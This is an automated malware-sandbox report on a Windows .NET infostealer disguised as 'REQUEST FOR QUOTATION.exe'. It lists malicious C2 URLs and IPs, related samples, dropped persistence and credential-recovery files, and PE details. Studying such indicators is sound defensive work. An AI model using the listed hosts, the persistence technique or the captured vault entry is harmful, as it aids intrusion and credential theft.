https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C	systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM	systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g	systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM	systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/pics/12471/libgh.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.internationalsoccerteams.com/Anti_Wrinkle_Creams.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com	systray.exe, 00000008.00000002.924420530.0000000005839000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/js/min.js?v2.2	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
204.11.56.48	unknown	Virgin Islands (BRITISH)		40034	CONFLUENCE-NETWORK-INCVG	true
166.62.28.109	unknown	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356564
Start date:	23.02.2021
Start time:	10:16:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 42s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	REQUEST FOR QUOTATION.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/9@8/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 24% (good quality ratio 22.2%) Quality average: 70.4% Quality standard deviation: 31.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 168.61.161.212, 13.88.21.125, 52.147.198.201, 104.43.139.144, 51.104.139.180, 52.155.217.156, 8.238.85.126, 8.248.135.254, 8.238.85.254, 8.241.80.126, 8.248.137.254, 20.54.26.129, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:17:08	API Interceptor	1x Sleep call for process: REQUEST FOR QUOTATION.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
204.11.56.48	PO_210223.exe	Get hash	malicious	Browse	www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	www.bigias.com/dgn/?Yzrp=LfNQbftNF2CZK3Pdbvfs/GUpg4UhIVB9HREii+G/2FPSQnC/ZhagFrpEcGqY3PnsjIPUew==&Lzrl=k6fTBXMx9H
	8nxKYwJna8.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?UT=EhUhb4&OjKL3=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvp2wRjK1uE1w
	win32.exe	Get hash	malicious	Browse	www.buythinsecret.com/incn/?8pBP5p=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06IZ75j/ocR9F&L6Ah=2dSLFXghYtFd0
	mitbjisfe.js	Get hash	malicious	Browse	urchintelemetry.com/
	Details...exe	Get hash	malicious	Browse	www.coolgadgetsdominate.com/t052/?pPX=6CpI00+2HCKGB1JbH22k369411uOsTuNarkGYMnsdTbHzEXKI/PSljtTQWzMzlp4SIHA&1b=jnKtRfexr
	Fdj5vhj87S.exe	Get hash	malicious	Browse	www.buythinsecret.com/incn/?2de=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06L5BpyfQG2cC&2dpxxT=i6MpbxRhTzX8wRbP
	Statement Of Account.exe	Get hash	malicious	Browse	www.perphaseelectronics.com/sz0m/?Kh=HN60TPe8&GvIHh=TGzqOvQKUvlZAzOTrBjC19//UpjckKets6PHJd4ZAWTshAj7ZEPkQjI0VseEDOP7xUYnIWwQiw==
	yxYmHtT7uT.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?Aro=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqaKSimOtzUhnn+APQ==&EHU40X=gbWtoXjpHB
	spptqzbEyNlEJvj.exe	Get hash	malicious	Browse	www.become-flightattendant.com/umSa/?Bn=d8+Yc1Kqdgg0yWZra+sA0ykjlSaGatnyagLIGXz6IWosdhkxYMJxV2/awb2OazI1/ohH&Rv=Y2JToVAX_DCpOHB
	pHUWiFd56t.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?Rxl=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&LJB=GbtlyLR0j
	Q38V8rfI5H.js	Get hash	malicious	Browse	legitville.com/0.html
	Q38V8rfI5H.js	Get hash	malicious	Browse	legitville.com/0.html
	Z4VzMe8IqZ.js	Get hash	malicious	Browse	urchintelemetry.com/
	Z4VzMe8IqZ.js	Get hash	malicious	Browse	urchintelemetry.com/
	test.bat	Get hash	malicious	Browse	local-update.com/banana.png
	SecuriteInfo.com.Heur.16160.xls	Get hash	malicious	Browse	www.heretangier.com/p2he/?cF=CXY0HpOvAiNao/7hyD46ZbvJkOBYOaiMbMD/1gQDGANTp/VCja9vaOiD7B1AqPi5K6pAxQ==&SBZ=epg8b
	YT0nfh456s.exe	Get hash	malicious	Browse	www.wood-decor24.com/csv8/?jFNHHj=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&Ppd=_6g8yvxH-6HLN
	payment advise.exe	Get hash	malicious	Browse	www.couponquote.com/rbe/?8pV=_TJP3HkXZXxT3Te&lJBxWNm=NmtmFq3bM1GRjzQAFWXZGZs3nJJTmL04NhsM+Fht47V2qooXGZt1Rr5A9fSZbB9GvZz2
	NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXE	Get hash	malicious	Browse	www.starstylishinstitute.com/k47/?r6=GbwDj4ypT&-ZU=33t3A7xB80u5YuyQF102BXSRJYIHEjWKu55cOthnVryNN9gNL+MJJIyFRKYoAf86uF3O

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CONFLUENCE-NETWORK-INCVG	lpdKSOB78u.exe	Get hash	malicious	Browse	208.91.197.27
	PO_210223.exe	Get hash	malicious	Browse	204.11.56.48
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	208.91.197.91
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	204.11.56.48
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	DHL Document. PDF.exe	Get hash	malicious	Browse	208.91.197.91
	X1(1).xlsm	Get hash	malicious	Browse	66.81.204.228
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	208.91.197.27
	CX2 RFQ.xlsm	Get hash	malicious	Browse	66.81.204.228
	CX2 RFQ.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	66.81.204.228
	HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe	Get hash	malicious	Browse	208.91.197.39
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	208.91.197.91
	0C18PUs3bt.exe	Get hash	malicious	Browse	208.91.197.27
	Quotation.exe	Get hash	malicious	Browse	209.99.64.55
	Credit Card & Booking details.exe	Get hash	malicious	Browse	208.91.197.27
	DnHeI10lQ6.exe	Get hash	malicious	Browse	209.99.40.222
AS-26496-GO-DADDY-COM-LLCUS	Quotation Reques.exe	Get hash	malicious	Browse	107.180.46.143
	4pFzkB6ePK.exe	Get hash	malicious	Browse	184.168.131.241
	PO_210223.exe	Get hash	malicious	Browse	23.229.197.103
	NewOrder.xlsm	Get hash	malicious	Browse	107.180.25.8
	PO-29840032.exe	Get hash	malicious	Browse	107.180.2.197
	PO_210222.exe	Get hash	malicious	Browse	184.168.131.241
	Order83930.exe	Get hash	malicious	Browse	192.169.223.13
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	184.168.131.241
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	184.168.131.241
	PDF.exe	Get hash	malicious	Browse	184.168.131.241
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	107.180.91.179
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	107.180.91.179
	Statement-ID72347595684775.vbs	Get hash	malicious	Browse	107.180.91.179
	SOA.exe	Get hash	malicious	Browse	184.168.131.241
	YSZiV5Oh2E.exe	Get hash	malicious	Browse	184.168.131.241
	Confirmation.exe	Get hash	malicious	Browse	184.168.131.241
	Purchase order.exe	Get hash	malicious	Browse	184.168.131.241
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	184.168.131.241
	IMG_7189012.exe	Get hash	malicious	Browse	184.168.131.241
	DHL Shipment Notification 7465649870,pdf.exe	Get hash	malicious	Browse	184.168.131.241

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\REQUEST FOR QUOTATION.exe.log Download File
Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	true
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp Download File
Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.196252394079166
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGLBtn:cbhK79lNQR/rydbz9I3YODOLNdq3KT
MD5:	72D8891C3265016E7AC805C2FC365122
SHA1:	99876B512556D50D92BC71E253042B372FA3F6DF
SHA-256:	23230404E6FBCD9B342DBCBBB0DFD357F40E4FBCC0A9A3600C088E657161B4C8
SHA-512:	C9DFDA0F1F57CEE610AF924FFD202FBFCDDDF40C955471ED6A1138E74D3FC73B0D545854FDA75C0D2453C86446FC6D7AFCD58F03DF3B7A1D7F856FDF2661F4D0
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogim.jpeg Download File
Process:	C:\Windows\SysWOW64\systray.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	96116
Entropy (8bit):	7.919257238745839
Encrypted:	false
SSDEEP:	1536:CLVy/rPpy6cOvdvSxII12c8QJCPr9JeDKfusQMFCNc7ZsJp3KNXpzrwZ+90zmuiO:maFtcOvdq112c8QOr9JeDKf9QooeuX6k
MD5:	BF53111F720BA060D72C938DD168979F
SHA1:	71D1E62E498858889495387A3E29B8F91AC6FEAB
SHA-256:	F86DCE5E8A94F57295455EA6F3DAA99FE580324F381F45A5D154A4E9C1258E5A
SHA-512:	A16F1211C373BC9139F832409F7BD8DA8E836DF305948953DB8F62FEB6376390739293A291DDB0A05E49496076DBC1C72BBB3E5C41899A491BF3E7E0C3A3162C
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%...d....

C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogrg.ini Download File
Process:	C:\Windows\SysWOW64\systray.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Reputation:	high, very likely benign file
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogri.ini Download File
Process:	C:\Windows\SysWOW64\systray.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Reputation:	high, very likely benign file
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\8LM54D1A\8LMlogrv.ini Download File
Process:	C:\Windows\SysWOW64\systray.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.504419962158467
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4Mlr9yvdEoY:MlIaExGNYvOI6x4YGY
MD5:	3CB0736DD1A981F8FF17BB1F9E4A260D
SHA1:	843AF6BD0D61C5E87340E9E84BF18640475F5223
SHA-256:	88D88AACF3DEDD2568BCEE741F9EFE90D86B6958A00D870B914F13A2AAB920FC
SHA-512:	12C2F6B3DF81EBB37CF7D98758BE52BAD60262F34D50DC84456B13F21EB6CBDD797E08B247FBEEA4B03BB784DC170F6C873B0C01AC7088E195570F306FFEFB9B
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.j.x.q.l.y.m.d.o.g.z.x.t.d.z.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe Download File
Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	6.7007252218514575
Encrypted:	false
SSDEEP:	12288:R/jnUkDtGR2n4mcrtgRXLhwymVnx4AAcK0Aw7zkXFl1Cvt:R4RQUaRXLCVnxQcK0mFl1o
MD5:	1D229F76672A250BD0C2FF84417D63E3
SHA1:	907889EF592995B2E923BC367AD5FE5FB3AB8275
SHA-256:	65DBAF77C991E5737ECF9041DEA34A7E9ECA1E38925FF69340435A3CFF1314A3
SHA-512:	3DE92FDB60D31DA35848F58E22B3983E2004AC8B1D2681DD518E3F05BC760F41C91AB0F3D15B6E71EF7C16CBB596C1AC7A136703B28DD3223B3338FA9CF38E49
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 15%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y3`..............P..B...L.......a... ........@.. ....................................@..................................`..W........J........................................................................... ............... ..H............text....A... ...B.................. ..`.rsrc....J.......J...D..............@..@.reloc..............................@..B.................`......H.......$b..............t................................................0..#.......+.&...(....(..........(.....o.......................0..........+.&..8......8.....+/..ma.+...da...nXE............"...X....j(.....+.......+......&.m(.....+...nYE...................8...F...a...j...s..........+.8~.......8u.......8l........&...8^.....(......8P.....(......8B.....(....+.(....8,......8'.......8........8......(....+..8.......8....*..0..........+.&...+>..da.+...qa8......oX+T.q(.....+.

C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.7007252218514575
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	REQUEST FOR QUOTATION.exe
File size:	1282048
MD5:	1d229f76672a250bd0c2ff84417d63e3
SHA1:	907889ef592995b2e923bc367ad5fe5fb3ab8275
SHA256:	65dbaf77c991e5737ecf9041dea34a7e9eca1e38925ff69340435a3cff1314a3
SHA512:	3de92fdb60d31da35848f58e22b3983e2004ac8b1d2681dd518e3f05bc760f41c91ab0f3d15b6e71ef7c16cbb596c1ac7a136703b28dd3223b3338fa9cf38e49
SSDEEP:	12288:R/jnUkDtGR2n4mcrtgRXLhwymVnx4AAcK0Aw7zkXFl1Cvt:R4RQUaRXLCVnxQcK0mFl1o
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y3`..............P..B...L.......a... ........@.. ....................................@................................

File Icon


Icon Hash:	71e8e4a8e8f634c0

Static PE Info

General
Entrypoint:	0x53610e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x603379E0 [Mon Feb 22 09:31:12 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
